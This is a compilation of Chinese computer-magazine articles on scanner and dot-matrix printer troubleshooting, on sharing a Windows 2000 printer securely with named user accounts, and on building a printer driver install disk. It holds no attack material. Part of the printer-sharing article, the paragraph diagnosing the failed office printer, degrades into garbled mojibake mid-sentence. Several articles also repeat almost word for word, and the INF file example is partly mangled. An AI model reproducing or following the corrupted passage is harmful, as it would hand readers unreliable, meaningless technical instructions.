   确认是否先开启扫描仪的电源，然后才启动计算机。如果不是，可以按“设备管理器”的“刷新”按钮，查看扫描仪是否有自检，绿色指示灯是否稳定地亮着。假若答案肯定，则可排除扫描仪本身故障的可能性。如果扫描仪的指示灯不停地闪烁，表明扫描仪状态不正常。先检查扫描仪与电脑的接口电缆是否有问题，以及是否安装了扫描仪驱动程序。此外，还应检查“设备管理器”中扫描仪是否与其他设备冲突（IRQ或I/O地址），若有冲突可以更改SCSI卡上的跳线。

   3、扫描仪Ready灯不亮
   打开扫描仪电源后，若发现Ready灯不亮，先检查扫描仪内部灯管。若发现内部灯管是亮的，可能与室温有关。解决的办法是让扫描仪通电半小时后，关闭扫描仪。一分钟后再打开它，问题即可迎刃而解。若此时扫描仪仍然不能工作，则先关闭扫描仪，断开扫描仪与电脑之间的连线，将SCSI ID的值设置成7，大约一分钟后再把扫描仪打开。 在冬季气温较低时，最好在使用前先预热几分钟，这样就可避免开机后Ready灯不亮的现象。

   4、输出图像色彩不够艳丽
   如果扫描的图像色彩不够艳丽，可以先调节显示器的亮度、对比度和Gamma值。Gamma值是人眼从暗色调到亮色调的一种感觉曲线。
   Gamma值越高感觉色彩的层次就更丰富。在扫描仪自带的扫描应用软件里，我们可以对Gamma值进行调整。当然，为了求得较好的效果，你也可以在Photoshop等软件中对Gamma值进行调整，但这属于“事后调整”。在扫描仪自带的软件中，如果是普通用途，Gamma值通常设为1.4；若用于印刷，则设为1.8；网页上的照片则设为2.2。还有就是扫描仪在使用前应该进行色彩校正，否则就极可能使扫描的图像失真；此外还可以对扫描仪驱动程序对话框中的亮度/对比度选项进行具体调节。


扫描仪的“另类”用法

《一键清理系统垃圾》

扫描仪的“另类”用法

《中国电脑教育报》于祥云

    我们学校是一所人数不多的初级中学，老师们最头疼的是刻印试卷，原来我们用原始的铁笔加蜡纸外加油印的方式，过程太繁琐，效果也十分不好。后来买了电脑、打印机和快速油印机，油印的效率虽然上去了，可是录入太慢，得一个字一个字地敲进去，碰到化学方程式、数学符号更是繁琐得不得了。

    这时我想到了扫描仪，因为我知道扫描仪有识别功能，可等扫描仪买到以后，却发觉扫描仪的识别功能实在是有限，效果也不尽如人意。可在摸索过程中我却发现了扫描仪的另类用法——做一体化机用，来看看我的方法吧。

    如此“另类”

    1、首先在Word中制作一个试卷模板，也就是设定好页边距，再将页面分为两栏。

    2、用扫描仪将所要打印的内容扫入并保存成任意一种图片格式（注意要命名好，前后的顺序不能乱）。

    3、再次打开试卷模板，选择菜单“插入→图片→来自文件”，将命名好的文件选中即可。这样就可以将文件打印到蜡纸上了，然后再拿到油印机油印就可以了。

    粗略算一下，还真是划算，几百元的扫描仪却可以当做几千元的一体机来用，而且原来的电脑、打印机、油印机还可以继续使用，效率却大大的提高了。不过先别急着高兴，还有注意事项呢，要仔细看好呀。

    注意事项

    1、打印机必须为针式打印机，否则无法打印蜡纸。

    2、图片的保存格式尽量不用使用BMP格式，因为这种格式占的空间太大。

    3、在插入图片时不能超出页边距以外，如果超出，打印的效果不好，还会产生数不清的小麻点。

    4、扫描的文本一定要干净，不然试卷会惨不忍睹哦！


扫描仪故障分析

《一键清理系统垃圾》

扫描仪故障分析

扫描仪的普及率越来越高了，但是这类外设的故障也比较多，而且故障的原因也比较复杂。以往的手持式扫描仪、滚筒式扫描仪现在都不是市场的主流了，而平板扫描仪才是最受欢迎的。就使用寿命来说，平板扫描仪是最长的，其次是滚筒式扫描仪，手持式扫描仪的使用寿命相对较低。这主要是因为这三种扫描仪的内部结构不同，使用方式不同所致。

    我们先来了解一下扫描仪的工作方式，其实很简单，就是利用光源照射原稿或者图片上产生高亮度反射光线，光线通过反射镜、透射镜，由分光镜进行色彩分离，照射到CCD(电荷耦合器件，Charge Coupled Device)元件上，CCD元件将光信号转换为电信号，传送到计算机中。因此，扫描仪的关键配件是CCD，它的品质直接影响着扫描仪的性能。

    扫描仪主要由感光器件、大功率的日光灯管、驱动马达、驱动皮带、模数信号转换器所组成，其中感光器件的工作是将感应到的光信号转换成电信号。大功率光管用于对文字或者图像进行强烈的照射以达到完全感应的作用。驱动马达的作用是带动日光灯管，将光一步步扫过需要的物品。驱动皮带是与驱动马达一齐带动日光灯管的装置。模数信号转换器也就是将模拟电信号转换成为数字信号以供电脑识别。

    确定故障的方法可以是观察法，观察产生故障的原因，确定有问题的部件，例如扫描仪没有响应，可以考虑到电源线有没有接好；也可以是测试法，进行测试，确定有问题的地方，例如扫描一张图片，发现扫描的图像不够清晰；还有筛选法，当用观察法的时候发现可能引致故障有几个部件的时候，可以使用筛选法进一步确定故障部位。有时候多使用一些方法，便可以确定故障的源头，然后寻求解决的办法。

    常见故障一：找不到扫描仪

    相信这是最常见的故障。先用观察法看看扫描仪的电源及线路接口是否已经连接好，然后确认是否先开启扫描仪的电源，然后才启动计算机。如果不是，可以按Windows“设备管理器”的“刷新”按钮，查看扫描仪是否有自检，绿色指示灯是否稳定地亮着。假若答案肯定，则可排除扫描仪本身故障的可能性。如果扫描仪的指示灯不停地闪烁，表明扫描仪状态不正常。这时候可以再重新安装最新的扫描仪驱动程序。同时，还应检查“设备管理器”中扫描仪是否与其他设备冲突(IRQ或I/O地址)，若有冲突就要进行更改。记住，这类故障无非就是线路问题、驱动程序问题和端口冲突问题。

    常见故障二：扫描仪没有准备就绪

    打开扫描仪电源后，若发现Ready(准备)灯不亮，先检查扫描仪内部灯管。若发现内部灯管是亮的，可能与室温有关，解决的办法是让扫描仪通电半小时后关闭扫描仪，一分钟后再打开它，问题即可迎刃而解。若此时扫描仪仍然不能工作，则先关闭扫描仪，断开扫描仪与电脑之间的连线，将SCSI ID的值设置成7，大约一分钟后再把扫描仪打开。在冬季气温较低时，最好在使用前先预热几分钟，这样就可避免开机后Ready灯不亮的现象。

    常见故障三：扫描出来的画面颜色模糊

    首先通过观察法看看扫描仪上的平板玻璃是否脏了，如果是的话请将玻璃用干净的布或纸擦干净，注意不要用酒精之类的液体来擦，那样会使扫描出来的图像呈现彩虹色。如果不是玻璃的问题，请检查扫描仪使用的分辨率是多少，如300dpi的扫描仪扫1200dpi以上的影像会比较模糊。因为300dpi的扫描仪扫1200dpi相当于将一点放至四倍大。另外，请检查显示器设置是否为16bit色或以上。如果是扫描一些印刷品，有一定的网纹造成的模糊是可以理解的，处理方法可以用扫描仪本身自带的软件，也可以用Photoshop等图像软件加以处理。

    常见故障四：输出图像色彩不够艳丽

    遇到这种故障，我们首先可以先调节显示器的亮度、对比度和Gamma值。Gamma值越高，感觉色彩的层次就越丰富。我们可以对Gamma值进行调整。当然，为了求得较好的效果，你也可以在Photoshop等软件中对Gamma值进行调整，但这属于“事后调整”，我们可以根据扫好的照片的具体情况进行Gamma值的调整。在扫描仪自带的软件中，如果是普通用途，Gamma值通常设为1.4；若是用于印刷，则设为1.8;网页上的照片则设为2.2。还有就是扫描仪在使用前应该进行色彩校正，否则就极可能使扫描的图像失真；此外还可以对扫描仪驱动程序对话框中的亮度/对比度选项进行具体调节。

    扫描仪的问题通常出自扫描效果，这往往也是软件故障之一，不同的扫描仪对这些软件故障有不同的解决办法，可以利用相关软件进行修正。而硬件故障方面主要是接口、线路问题，只要大家连接好线路、设置好端口，用最新的驱动程序，这些问题应该是容易解决的。


扫描仪故障分析与排除

《一键清理系统垃圾》

扫描仪故障分析与排除

扫描仪是一种被广泛应用于计算机的输入设备。作为光电、机械一体化的高科技产品，它是我们常用的办公设备，可它一旦出现故障就会令我们束手无策，有些故障需要专业人员维修，也有许多故障是自己就可以排除的。下面就向大家介绍一些常见故障的排除方法：

    一、扫描仪的拆卸

    在维护和检修时往往需要拆卸扫描仪，因此首先为大家介绍扫描仪拆卸的基本方法：
    1、首先拆除玻璃平台，用十字旋具伸入圆孔中拧下螺钉，即可向上取下顶盖和玻璃平台。打开扫描仪后，即可看到步进电动机、传动带、扫描头和电路板等部件。有些扫描仪的上下两部分不是用螺钉而是用塑料卡扣衔接，拆卸时用平口小旋具插到缝隙中撬开塑料卡扣，即可分离上下两部分，撬塑料卡扣时动作要轻，不要损坏塑料部件。
    2、拔下数据软排线。扫描仪内部一般有两块电路板，-块固定在扫描头后侧，另-块安装在扫描仪后侧，两块电路板通过数据软排线相连接。取下扫描头之前需先取下数据软排线。数据软排线卡在电路板上的排线卡槽中，取下软排线时需先将排线卡槽两侧的卡销向外拨，而后即可很轻松地向外抽出软排线。

    3、拆卸扫描头。扫描头大多穿在圆形金属杆(导轨)上，由传动带带动沿扫描仪纵向运动，只需将圆形金属杆从底座上的塑料卡座中取下，使扫描头脱离传动带，即可向上取下扫描头和圆形金属杆，而后将圆形金属杆从扫描头上抽出。
    4、取下灯管。灯管位于扫描头顶部，沿扫描头横向放置，卡在扫描头两侧的塑料卡座上，其供电电源插头插在扫描头后侧的电路板上。只需取下电路板上灯管的供电电源插头，即可从扫描头上取下灯管。最细的灯管只有火柴棍粗细，拆卸、放置时需特别小心。
    5、拆除电路板。拧下两粒螺钉即可取下扫描头上的电路板，在电路板正面就能看到双列直插封装的CCD器件。由于CCD器件需正对扫描光路中光学透镜，安装还原不当会影响扫描质量，建议不要随便拆下扫描头上的电路板。

    二、常见故障原因与排除

    1、整幅图像只有一小部分被获取

    故障原因与排除：聚焦矩形框仍然停留在预览图像上；只有矩形框内的区域被获取。在做完聚焦后，点击一下去掉聚焦矩形框，反复试验以获得图像。

    2、图像中有过多的图案（噪声干扰）

    故障原因与排除：扫描仪的工作环境湿度超出了它的允许范围(也许是扫描仪在允许范围外被存放或运输了)。让扫描仪工作在允许范围内。关掉计算机，再关掉扫描仪，然后先打开扫描仪，再打开计算机，以重新校准扫描仪。

    3、原稿颜色与屏幕颜色差别太大

    故障原因与排除：
    (1)检查屏幕的色度、亮度、反差的设定是否合乎正常要求。
    (2)检查ColorLinks的屏幕设定选项是否正确。
    (3)如果FotoLook是外挂在Photoshop下执行，请检查File-Preferences Monitor Setup，Printing lnks Setup和Seperation Setup是否正确。
    (4)假设上述设置皆正确时，可以做一下扫描仪与显示屏之间的色彩校正

    4、扫描出的整个图像变形或出现模糊

    故障原因与排除：
    (1)扫描仪玻璃板脏污或反光镜条脏污；用软布擦拭玻璃板并清洁反光镜条。
    (2)扫描原稿文件未能始终平贴在文件台上；确保扫描原稿始终平贴在平台上。
    (3)确保扫描过程中不要移动文件。
    (4)扫描过程中扫描仪因放置不平而产生震动；注意把扫描仪放于平稳的表面上。
    (5)调节软件的曝光设置或“Gamma”设置。
    (6)若是并口扫描仪发生以上情况，可能是传输电缆存在问题，建议使用IEEE-1284以上的高性能电缆。

    5、扫描的图像在屏幕显示或打印输出时总是出现丢失点线的现象

    故障原因与排除：
    (1)检查扫描仪的传感器是否出现了故障或文件自动送纸器的纸张导纸机构出现故障，找专业人员进行检查维修。
    (3)对扫描仪的光学镜头做除尘处理，用专用的小型吸尘器效果最好。
    (4)检查扫描仪外盖上的白色校正条是否有脏污，需及时清洁。
    (5)检查一下稿台玻璃是否脏了或有划痕，可以定期彻底清洁扫描仪或更换稿台玻璃来避免该情况的发生。后一种情况应与当地授权技术服务中心联系。

    6、扫描印刷品时，龟纹（交叉影像）出现在图像的特定区域内

    故障原因与排除：首先让我们来了解一下彩色印刷品成像的简单原理。试着拿放大镜观察一下一般的彩色印刷品，其实任何图文都是通过4种颜色来组成，就是经常提及的青色、品红色、黄色与黑色。这些颜色是很细小的墨点(好的彩色印刷应该有1200 dpi的分辨率)，利用墨点的排列组合方式让眼睛产生错觉，比如某一区红色的墨点比较多，人脑的视觉系统就会以为这一区偏红色。这样细小的网点，在扫描的时候会被灵敏的感光组件所侦测出来，于是扫描的结果会让整张图片有各种纹路出现，严重影响扫描图像的品质。可以采用以下几种方案来避免龟纹的产生。
    (1)在“图像类型”中选择“彩色照片”（去网纹）设置，或在“图像类型”对话框中选“去网纹”设置。
    (2)在文件和稿台间放置一张透明页，使图像散焦。
    (3)正确定位图像。
    (4)可稍调小图像尺寸。
    (5)在扫描仪的了TWAIN中选中“清除边缘清晰化”复选框。


在因特网中实现网络打印机的安全共享

《一键清理系统垃圾》

在因特网中实现网络打印机的安全共享

    IPP(Internet Printing Protocol，因特网打印协议)的使用，使得任何一台支持IPP协议的网络打印机只要连接到因特网上，就将拥有自己的Web地址。网络打印机的使用，不仅节约了办公成本，同时也方便了人们的操作。但因特网上的计算机只要知道这台打印机的Web地址，就可以访问和共享此台打印机，完成自己的打印作业。那么，怎样才能在因特网中实现网络打印机的安全共享呢？

    一、Windows 98中的打印机共享

    最好设置密码，不然远程用户稍加配置后就可以使用你的打印机了。

    二、Windows 2000(包括Windows NT)与Windows 98之间的打印机共享

    默认情况下Windows 2000的Guest账户是禁用的，Windows 98用户想使用Windows 2000的共享打印机时，只要在Windows 2000中启用Guest账户即可(在“控制面板→管理工具→计算机管理→用户”中进行设置)。可是，不安全因素随之出现，当Windows 2000启用Guest账户并将打印机设成共享后，默认权限是Everyone都可打印，也就是说任何能连网的用户都可以使用你的打印机。

    如何才能让因特网上的打印机实现安全共享呢？其实实现起来也不难：不要启用Guest用户，在Windows 2000中新建一个普通用户，并设置密码。需使用Windows 2000共享打印机的Windows 98用户每次以刚才新建的用户名和密码登录Windows 98系统，当Windows 98试图访问Windows 2000的共享打印机时就会用登录的用户名和密码去验证。刚好Windows 2000中有这样的用户名和密码，验证通过，可以正常使用打印机。而不知道用户名和密码的用户将被拒之门外。

    三、Windows 2000(包括Windows NT)中的打印机共享

    我们办公室的打印机本来是接在一个同事的计算机上的，他装的是Windows 2000专业版，并启用了Guest账户。以前打印机一直打印良好，可近来不知怎的，很多使用Windows 2000的同事都无法正常使用该打印机。当点击打印图标时本机报告打印正常，可网络打印机一点儿反应也没有，如在“运行”中输入“\装有共享打印机的计算机的IP地址C保鲇没兔苈胙橹ご翱冢淙敫没魃系墓芾碓庇没兔苈牒螅磺写蛴≌＃黄渌沧癢indows 98的同事一直打印正常。经仔细分析，发现原因如下：

    在“控制面板→管理工具→计算机管理→共享”下，print蚕淼陌踩昵┲猩柚萌绺酵妓荆渲胁⒚挥卸云胀ㄓ没Ы惺谌ǎ訵indows 2000系列的计算机都无法正常使用共享打印机(Windows 98为何行，我想可能是不同系统之间的安全级别要求低的缘故吧)，添加Everyone并赋予默认的权限后，整个办公室中所有的计算机打印都恢复正常。其实这里开放Guest用户和第二条所述的一样，仍然存在着不安全因素，根本的解决办法就是在装有打印机的Windows 2000中新增几个普通用户，并增设密码(密码的设定由每一个想共享打印的人自行设定，对其他人保密)，把新增的用户分给想使用共享打印机的人。如果是Windows 98用户可直接以用户名和密码登录；如果是Windows 2000用户，则要在“控制面板→管理工具→计算机管理→用户”中更改默认管理员的用户名为自己分得的用户名，密码与刚才所设的一样。以后就算连有打印机的人也无法知道原来的密码。

    经过上述设置后，实现了因特网打印机的安全共享，但并不失它原有的灵活性和方便性。

作者：崔北亮
来源：中国电脑教育报


针式打印机急救“123”

《一键清理系统垃圾》

针式打印机急救“123”

    在日常工作中，使用针式打印机时经常会遇到一些问题，有些只是举手之劳便可解决，但处理不好也只能“望机兴叹”了，现举几个常例，与大家共飨：
    1.打印机总是处于缺纸状态，装上打印纸也报缺纸，或不能自动装打印纸。
    对于大多数24针打印机来说，检查是否缺纸，靠的是装在滚筒后下部的一个光电传感器（外观黑色方形，有两个小灯孔）来完成。正常时传感器发出的光经纸面反射后被传感器接收并产生一个电信号，给出有纸信号。出现这类故障，可能是传感器表面被灰尘遮住引起的，这时可取下导纸板，打开后盖，用摄子夹着干净小棉球轻轻擦干净传感器表面即可；如此之后还报缺纸，那就有可能是传感器需要更换了。一般情况下是前一类故障。
    2.打印机工作过程中打印头突然停下，并同时发出“咯吱”声，重新开机可继续，但还会出现上述现象。
    可能是打印头导杆上落的灰尘太多，或使用时间长缺乏润滑油，引起磨擦力增大，打印头不能正常来回走动所致。先关机，在打印头导杆上加上适量的润滑油（注意不要将油滴到下面的电路板上），用手来回移动打印头，再用棉纸或软布清除上面的油污。然后再加上适量的润滑油即可。也可能是滚筒使用时间长后，表面出现高低不平的沟阻挡打印头，果真如此，那也只有更换滚筒了。
    3.打印蜡纸时蜡纸总是打皱，油印版面不整洁，常有油墨道道出现。
    一般情况下是由于导纸板使用时间长后，中间有点弯曲，导致蜡纸不能平整进入，或者由于压纸滚轴没有调整好。
    方法1：去掉蜡纸里面的棉纸，来回几次反复调整压纸滚轴，同时也可用手指沿白纸面进纸处压着来回移动，以使蜡纸平整进入。
    方法2：去掉腊纸里面夹的棉纸层，把蜡纸面朝下，沿蜡纸另一面白纸上的虚线从左边撕开白纸至3/4处再进行打印。
    方法3：若遇到打印8开蜡纸及蜡纸横装打印时，先装进蜡纸，然后把导纸板平放，使蜡纸平行进入。
    4.打印的字模糊不清，调紧间距调杆，出现色带把打印纸蹭破。
    检查色带是否需要更换。
    打印头距离印字辊太近，调整间距调杆。
    打印头的出针口被油污堵塞。关机，将打印头从打印机上卸下，用无水酒精浸泡打印针的出针口的纤维丝、蜡油堵塞杂物，然后再用无水酒精清洗，凉干装上即可。若发现打印针陷入针孔较深，就应该考虑换针。
    5.自检正常，但不能联机打印。
    自检正常说明打印机工作正常，插拔检查打印机数据线是否松动；或使用一根能正常工作的数据线，试机，工作正常，更换一根数据线。
    6.打印蜡纸时，蜡纸被打印头蹭破。
    其一，检查打印头是否距离滚筒太近，调整右边的间距调杆；
    其二，检查打印头出口处是否有异物，参考问题4进行清除。
    其三，取出色带盒，卸下打印头，检查色带保护片是否磨损，正常保护片中间的孔为椭圆形，四周光滑对称。若有磨损，更换即可。


针式打印机缺纸处理

《一键清理系统垃圾》

针式打印机缺纸处理

    现在还有不少用户在用着针式打印机，但打印机日常缺乏保养，使用不当都会造成打印机报错。近日，笔者朋友单位有一台EPSON的针式打印机无法正常打印，老是报缺纸。

    我在计算机上试着打印一个测试页，屏幕出现错误。看看打印机上，纸张已经到位。难道是打印机驱动程序出问题了？虽然出这种问题的概率比较低，但为了防止意外，还是重新安装了一次驱动程序，完成后，问题依旧。试了试DOS下的打印命令，打印机丝毫没有动静。莫非是打印机连线出毛病了？
重新启动打印机，发现打印机有动静，打印头动了一下，看来和计算机连接部分没问题，关闭打印机，在开机的时候按住暂停键开机，正常情况下，打印机应该会打印字库和配置（不同的打印机按的键也不同）。

    针式打印机在进纸口这里有一个感应器，也可以叫触发器，纸张进纸后会碰到这个东西，该东西就像一个开关，看来问题应该在这上面，我用纸去碰这个部位，没有任何反映，难道是坏了？

    既然问题已经找到，拆开打印机。大家在拆的时候可不要使用暴力哦，打印机外壳部分比较脆弱，我们可以观察打印机外壳，来找卡口，打印机外壳一般是卡住的，再拧几个螺丝。拆开后，把胶棍部分取下，我们就可以看到一个小的感应器。原来是有一根与感应器连接的电线断了，造成没有反映而报缺纸。

    问题解决还算顺利，重新连接上电线，开机打印文件，一切正常。维修这类问题，可以根据现象，来寻找出故障的部位。在日常使用中，我们要注意平时对打印机的保养，打印纸张保持干净。


针式打印机维护经验14大法

《一键清理系统垃圾》

针式打印机维护经验14大法

    虽然目前市场上针式打印机的份额在不断下降，喷墨、激光打印机的占有率在急剧上升，但由于针式打印机的结构简单耐用，适合高强度打印，并且价格低廉以及它的特殊用途与独特功能，深受广大计算机用户尤其是特殊行业的青睐，它在银行、证券、保险，商务、运输以及税务等行业有着广泛的应用。与其他打印机一样，针式打印机同样需要正确的维护与保养。

    一、 打印机必须放在平稳、干净、防潮、无酸碱腐蚀的工作环境中，并且应远离热源、震源和避免日光直接照晒。针式打印机工作的正常温度范围是10℃～35℃（温度变化会引起电气参数的较大变动），正常湿度范围是30%～80%。

    二、要保持清洁。定期用小刷子或吸尘器清扫机内的灰尘和纸屑，要经常用在稀释的中性洗涤剂（尽量不要使用酒精等有机溶剂）中浸泡过的软布擦拭打印机机壳，以保证良好的清洁度。

    三、打印机上面请勿放置其他物品，尤其是金属物品如大头针，回行针等，以免将异物掉入针式打印机内，造成机内部件或电路板损坏。

    四、 针式打印机并行接口电缆线的长度不能超过2米。各种接口连接器插头都不能带电插拔，以免烧坏打印机与主机接口元件，插拔一定要关掉主机和打印机电源，不要让打印机长时间地连续工作。

    五、定期检查打印机的机械装置，检查其有无螺钉松动或脱落现象，字车导轨轴套是否磨损。输纸机构、字车和色带传动机构的运转是否灵活，若有松动、旷动或不灵活，则应分别予以紧固、更换或调整。

    六、正确使用操作面板上的进纸、退纸、跳行、跳页等按钮，尽量不要用手旋转手柄。若发现走纸或小车运行困难，不要强行工作，以免损坏电路及机械部分。
    七、检查打印头前面的色带保护片是否破损？若有破损会在打印过程中出现打印针刮色带或刮纸现象，最终将打印针挂断。应及时更换。

    八、打印头的位置要根据纸张的厚度及时进行调整。在打印中，一般情况不要抽纸。因为在抽纸的瞬间很可能刮断打印针，造成不必要的损失。

    九、针式打印机工作时，其打印头表面温度较高，不要用手随意触摸打印头表面。不要将手伸进打印机内，以免妨碍字车移动，甚至弄坏某些部件。

    十、为保证打印机及人身安全，电源线要有良好的接地装置，否则在机架和逻辑地上会有100多伏的交流电压。针式打印机的电源要用AC220±10%、50Hz的双相三线制中性电，尤其要保证良好的接地，以防止静电积累和雷击烧坏打印通信口等。

    十一、要选择高质量的色带。色带是由带基和油墨制成的，高质量的色带带基没有明显的接痕，其连接处是用超声波焊接工艺处理过的，油墨均匀，而低质量的色带带基则有明显的双层接头，油墨质量很差。

    十二、定期检查色带及色带盒，若发现色带盒太紧或色带表面起毛就应及时更换（注意色带的质量），否则色带盒太紧会影响字车移动，色带破损则会挂断打印针。

    十三、应尽量减少打印机空转。许多用户在实际工作中，往往打开主机即开打印机，这既浪费了电力又减少了打印机的寿命，故用户最好在需要打印时再打开打印机。

    十四、要尽量避免打印蜡纸。因为蜡纸上的石蜡会与打印胶辊上的橡胶发生化学反应，使橡胶膨胀变形。另外石蜡也会进入打印针导孔，易造成断针


针式打印机预防断针

《一键清理系统垃圾》

针式打印机预防断针

    在针式打印机的实际使用过程中，我们经常会遇到一些故障，下面笔者要谈到的断针现象就是最常见的针式打印机故障。对于打印机断针故障的维修，我们一般只能采用换针，维修起来颇为繁琐。事实上，在实际操作中只要你有注意以下十点使用注意事项，那么断针现象就会对你“敬而远之”了。
    1、经常清洁打印头
    长期使用的打印机，色带的油墨和污垢会堵塞了打印机的导针孔，使打印机在打印过程中运动阻力增加。这样容易造成打印机的打印针发生断针故障。所以一般打印机在使用3个月后应考虑清洗，如果使用频率高的打印机，在使用1个月后就要考虑清洗一次。
    2、选择使用高质量的色带
    由于高质量的色带的带基没有明显的接痕，其连接处是采用垫压技术处理的，油墨均匀；而质量低的色带采用的带基则会有明显的双层接头，且油墨质量差，容易造成断针。所以我们一般都应选择使用高质量的色带盒和色带，不要使用劣质的色带，并在使用前要注意严格检查。
    3、注意色带使用的时间
    如果使用时间过长，即使是高质量的色带也会出现弹性减弱、松驰变长，甚至会出现起皱和毛孔，非常容易造成断针。所以我们要留意色带使用的时间，同时一旦发现有以上现象出现，就应考虑更换色带。
    4、尽量少打印蜡纸
    长期打印蜡纸是造成打印机断针的一个重要原因。所以我们要尽量少打印蜡纸。即使要打印蜡纸，也要注意先将蜡纸下面的一层棉纸去掉，垫上一张打印纸，以减少打印头横向运动时的阻力。并且在打印完毕后，要及时用无水酒精清洗橡胶字辊，以保证字辊光滑。
    5、尽量使用质量好的打印纸
    打印纸的质量不合格时，会使打印头运行不畅导致断针。所以我们应尽量选择使用质量较好的打印纸，质量差或纸张表面不平整、有接头的纸最好不要用来打印。
    6、经常变换打印表格横线的位置
    当我们大量使用制表符来打印表格时，由于与表格横线对应的某些针使用频率过大，非常容易造成这些针的折断。所以我们一般不要进行长时间的连续打印表格。还有要经常变换打印横线的方法，以减轻打印针的负荷。
    7、合理调节好打印头前端和打印字辊之间的距离
    由于操作不当，会使打印机的打印头前端与打字字辊间的间隙不符合打印规格。间隙过小时，打印针打在字辊上的力量过大，容易造成断针；间隙过大时，打印出来的字迹太浅，同时由于针头伸出导板过长，也很容易断针。所以我们一定要按照配套打印机的使用说明书，掌握好“纸厚调整杆"的拨动方向和技术参数，根据不同的纸张决定相应的刻度，使之符合要求，避免断针现象的发生。
    8、打印过程中应尽量避免人为转动字辊
    在打印过程中，人为地转动字辊时，由于改变了打印头的运动方向，非常容易造成断针。所以我们应注意打印过程中应尽量避免人为转动字辊。
    9、不要在打印中强行撕纸
    由于撕纸时色带芯紧紧贴着打印头，使打印针非常容易打穿色带而直接引起断针现象。所以我们千万不要在打印过程中强行撕纸。
    10、尽量避免打印中突然关机或断电
    打印机在打印时，如果突然停电或突然关机，会造成打印针机不能及时缩回，也有可能造成断针。所以应尽量避免在打印未结束时就强行关机，另外可以考虑把打印机电源接在稳压电源（UPS）提供的供电插座上，以防止突然停电。


针式打印机怎样防止断针

《一键清理系统垃圾》

针式打印机怎样防止断针

1、经常清洁打印头

长期使用的打印机，色带的油墨和污垢会堵塞了打印机的导针孔，使打印机在打印过程中运动阻力增加。这样容易造成打印机的打印针发生断针故障。所以一般打印机在使用3个月后应考虑清洗，如果使用频率高的打印机，在使用1个月后就要考虑清洗一次。

2、选择使用高质量的色带

由于高质量的色带的带基没有明显的接痕，其连接处是采用垫压技术处理的，油墨均匀；而质量低的色带采用的带基则会有明显的双层接头，且油墨质量差，容易造成断针。所以我们一般都应选择使用高质量的色带盒和色带，不要使用劣质的色带，并在使用前要注意严格检查。

3、注意色带使用的时间

如果使用时间过长，即使是高质量的色带也会出现弹性减弱、松驰变长，甚至会出现起皱和毛孔，非常容易造成断针。所以我们要留意色带使用的时间，同时一旦发现有以上现象出现，就应考虑更换色带。

4、尽量少打印蜡纸

长期打印蜡纸是造成打印机断针的一个重要原因。所以我们要尽量少打印蜡纸。即使要打印蜡纸，也要注意先将蜡纸下面的一层棉纸去掉，垫上一张打印纸，以减少打印头横向运动时的阻力。并且在打印完毕后，要及时用无水酒精清洗橡胶字辊，以保证字辊光滑。

5、尽量使用质量好的打印纸

打印纸的质量不合格时，会使打印头运行不畅导致断针。所以我们应尽量选择使用质量较好的打印纸，质量差或纸张表面不平整、有接头的纸最好不要用来打印。

6、经常变换打印表格横线的位置

当我们大量使用制表符来打印表格时，由于与表格横线对应的某些针使用频率过大，非常容易造成这些针的折断。所以我们一般不要进行长时间的连续打印表格。还有要经常变换打印横线的方法，以减轻打印针的负荷。

7、合理调节好打印头前端和打印字辊之间的距离

由于操作不当，会使打印机的打印头前端与打字字辊间的间隙不符合打印规格。间隙过小时，打印针打在字辊上的力量过大，容易造成断针；间隙过大时，打印出来的字迹太浅，同时由于针头伸出导板过长，也很容易断针。所以我们一定要按照配套打印机的使用说明书，掌握好“纸厚调整杆"的拨动方向和技术参数，根据不同的纸张决定相应的刻度，使之符合要求，避免断针现象的发生。

8、打印过程中应尽量避免人为转动字辊

在打印过程中，人为地转动字辊时，由于改变了打印头的运动方向，非常容易造成断针。所以我们应注意打印过程中应尽量避免人为转动字辊。

9、不要在打印中强行撕纸

由于撕纸时色带芯紧紧贴着打印头，使打印针非常容易打穿色带而直接引起断针现象。所以我们千万不要在打印过程中强行撕纸。

10、尽量避免打印中突然关机或断电

打印机在打印时，如果突然停电或突然关机，会造成打印针机不能及时缩回，也有可能造成断针。所以应尽量避免在打印未结束时就强行关机，另外可以考虑把打印机电源接在稳压电源（UPS）提供的供电插座上，以防止突然停电。


针式打印头的简易清洗法

《一键清理系统垃圾》

针式打印头的简易清洗法

    EPSON LQ－1600K是一款性能不错的针式打印机，市场占有率较高。但有一点缺点，就是打印头容易断针。造成断针的原因主要有：1.使用劣质色带；2.打印针头有毛刺；3.打印头被油灰堵塞。大家知道，打印针是靠电磁铁击打出去的，而回针动作是靠弹簧的弹性收回的，上述三个原因都可使纤细的打印针无法收回而被走动的色带拉断。我们可以用优质色带或原装打印头来避免断针，但使用时间较长的打印头都不可避免地被油灰堵塞，特别是经常打印蜡纸，则更为严重。由于拆卸打印头逐根清洗相当麻烦，下面给大家介绍一种简易实用的清洗方法：
    把打印针头部分浸在无水酒精中，过一段时间后，在一张白纸上打印（不要色带），就会发现现在的打印机像喷墨打印机一样把油灰等杂物都喷了出来，反复数次，直到白纸上的印痕渐渐地淡了为止。此时，打印头就可以正常使用了。


自制打印机驱动程序安装盘

《一键清理系统垃圾》

返回总目录 上一页 目录页

自制打印机驱动程序安装盘

   症状：笔者经常遇到这样的问题，手头上没有某种打印机的驱动程序，刚好这台机子的Windows也不带这种打印机的驱动程序；而另一台机子上已安装了这种打印机的驱动程序(或者这一台机子的Windows版本更高，自带有这种类型的打印机驱动程序)，那么可不可以把驱动程序从这一台移植到另一台机子上呢？

   治疗方法：

首先，要知道这种打印机的驱动程序由哪些文件组成。点击“设置→打印机”，选中这种打印机，单击“属性→打印测试页”，便可以找出我们所需要的文件列表。然后把它们拷贝到一张空白软盘上。

第二步是自己制作安装打印机驱动程序所需要的inf文件(带.inf扩展名的包含控制硬件操作的设备信息或脚本文件)。这是最关键的一步。

下面以HP DESKJET 680C打印机为例说明inf的格式。HP680C.INF

Version：版本信息

Signature=“SCHICAGOS” Class=Printer：类型为打印机

Provider=“HP.INC”：提供商

LayoutFile=layout.inf：布局

Manufacturer：制造商

“HewlettPackard”：Hewlett Packard

 “HP Desket 680C”= HP680C：打印机类型为HP680C

DriverFile=HPDSKJTB.DRV：打印机驱动程序核心文件

CopyFiles=@HPDSKJTB.DRV HP680C＿FILES：打印机驱动程序支持文件

HP680C＿FILES sprint3.cat Dmcolor.dll Finstall.dll Iconlib.dll Unidrv.dll Unidrv.hlp

用记事本或其它文本编辑软件编好inf文件后存盘，拷贝到软盘上。

